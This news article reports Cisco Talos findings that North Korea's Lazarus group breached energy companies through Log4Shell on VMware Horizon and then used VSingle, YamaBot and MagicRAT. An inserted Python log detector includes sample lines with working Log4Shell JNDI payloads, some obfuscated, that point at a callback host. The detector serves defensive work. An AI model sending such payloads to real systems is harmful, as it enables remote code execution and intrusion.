A new cyber espionage campaign attributed to North Korea has been uncovered by security researchers – and the primary targets are energy companies in the US, Canada, and Japan.
Cisco Talos reported that Lazarus – a North Korea-affiliated hacking group also tracked as APT38 – targeted unnamed energy providers in the United States, Canada and Japan between February and July. The attackers gained initial access by exploiting Log4Shell (CVE-2021-44228), the remote code execution vulnerability in the Log4j logging library disclosed in December 2021, on internet-exposed VMware Horizon servers. Because the flaw lets an attacker run arbitrary code simply by getting a crafted string logged, it gave the group a foothold on the victim's systems from which to deploy malware.
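The practical question for a defender reading this is whether Log4Shell probes against a Horizon or other Java front end are visible in web access logs. The following is an added example, not code from the article or from Cisco Talos: a small detector that folds the common `${lower:...}` and `${...:-...}` obfuscations used to evade naive `${jndi:` string matching and then reports the callback host. The log lines, IP addresses and payloads are constructed for the example and do not come from the report; the combined-log format is assumed.

```python
"""Log4Shell (CVE-2021-44228) JNDI lookup detector for web access log lines."""
import re
from urllib.parse import unquote

# Constructed sample lines in combined-log style. The addresses and payloads
# are illustrative only and are not taken from the Cisco Talos report.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2022:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [12/Mar/2022:10:01:04 +0000] '
    '"GET /portal/?x=${${lower:j}ndi:${lower:r}mi://203.0.113.9:1099/b} HTTP/1.1" 400 0 "-" "curl/7.68"',
    '203.0.113.7 - - [12/Mar/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.9/c}"',
    '198.51.100.2 - - [12/Mar/2022:10:01:06 +0000] "GET /static/app.js HTTP/1.1" 200 9000 "-" '
    '"Mozilla/5.0 (jndi not a lookup)"',
]

# Lookups that only change the case of their argument: keep the argument.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}")
# "${something:-default}" evaluates to "default" when the lookup is empty,
# which covers "${::-j}", "${env:NOPE:-j}" and "${sys:nope:-j}".
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The resolved lookup a defender actually wants to alert on.
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http|https)://([^/}\s]+)")


def normalize(line: str, max_rounds: int = 16) -> str:
    """URL-decode (twice, for double-encoded payloads), lowercase, and fold the
    common Log4j lookup obfuscations until the text stops changing.
    Both patterns forbid nested braces, so each round folds the innermost
    lookups first."""
    text = unquote(unquote(line)).lower()
    for _ in range(max_rounds):
        folded = _CASE_LOOKUP.sub(r"\1", text)
        folded = _DEFAULT_LOOKUP.sub(r"\1", folded)
        if folded == text:
            break
        text = folded
    return text


def find_jndi_lookups(lines):
    """Return (line_number, scheme, callback_host) for every line that contains a
    resolved ${jndi:<scheme>://host...} lookup after normalization."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        match = _JNDI.search(normalize(raw))
        if match:
            hits.append((number, match.group(1), match.group(2)))
    return hits


if __name__ == "__main__":
    for number, scheme, host in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {scheme} to {host}")
```

Two caveats apply when using something like this for real. First, the payload often arrives in a header (User-Agent, X-Forwarded-For, X-Api-Version) that the default access log does not record, so the log format has to capture the fields the application actually logs. Second, the folding only covers the two most common obfuscation families; base64 or other encodings layered through further lookups will still need the raw `${` plus `jndi` heuristics, and the authoritative check remains whether the host has a vulnerable Log4j version on its classpath.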
Lazarus used the known malware families VSingle and YamaBot to keep covert access to the compromised systems and spy on them. Cisco Talos also found the group deploying a previously undocumented remote access trojan (RAT) it named MagicRAT, used not only for reconnaissance but also to steal credentials from infected machines.
“The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives,” Cisco Talos’ researchers said in their report. “This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”
TechCrunch noted that Lazarus is also financially motivated and is best known for the 2014 hack of Sony Pictures. The group has also been blamed for the WannaCry ransomware outbreak in 2017, and has been linked to the theft of about $100 million in crypto assets from Harmony's Horizon Bridge as well as roughly $625 million in cryptocurrency from the Ronin Network – the sidechain used by the game Axie Infinity.
Canada appears to be working towards a more unified cybersecurity front: in late August, the CIO Strategy Council announced that it was drafting a national occupational standard for organizations' cybersecurity staff. The council is asking industry stakeholders for further input and feedback on the draft.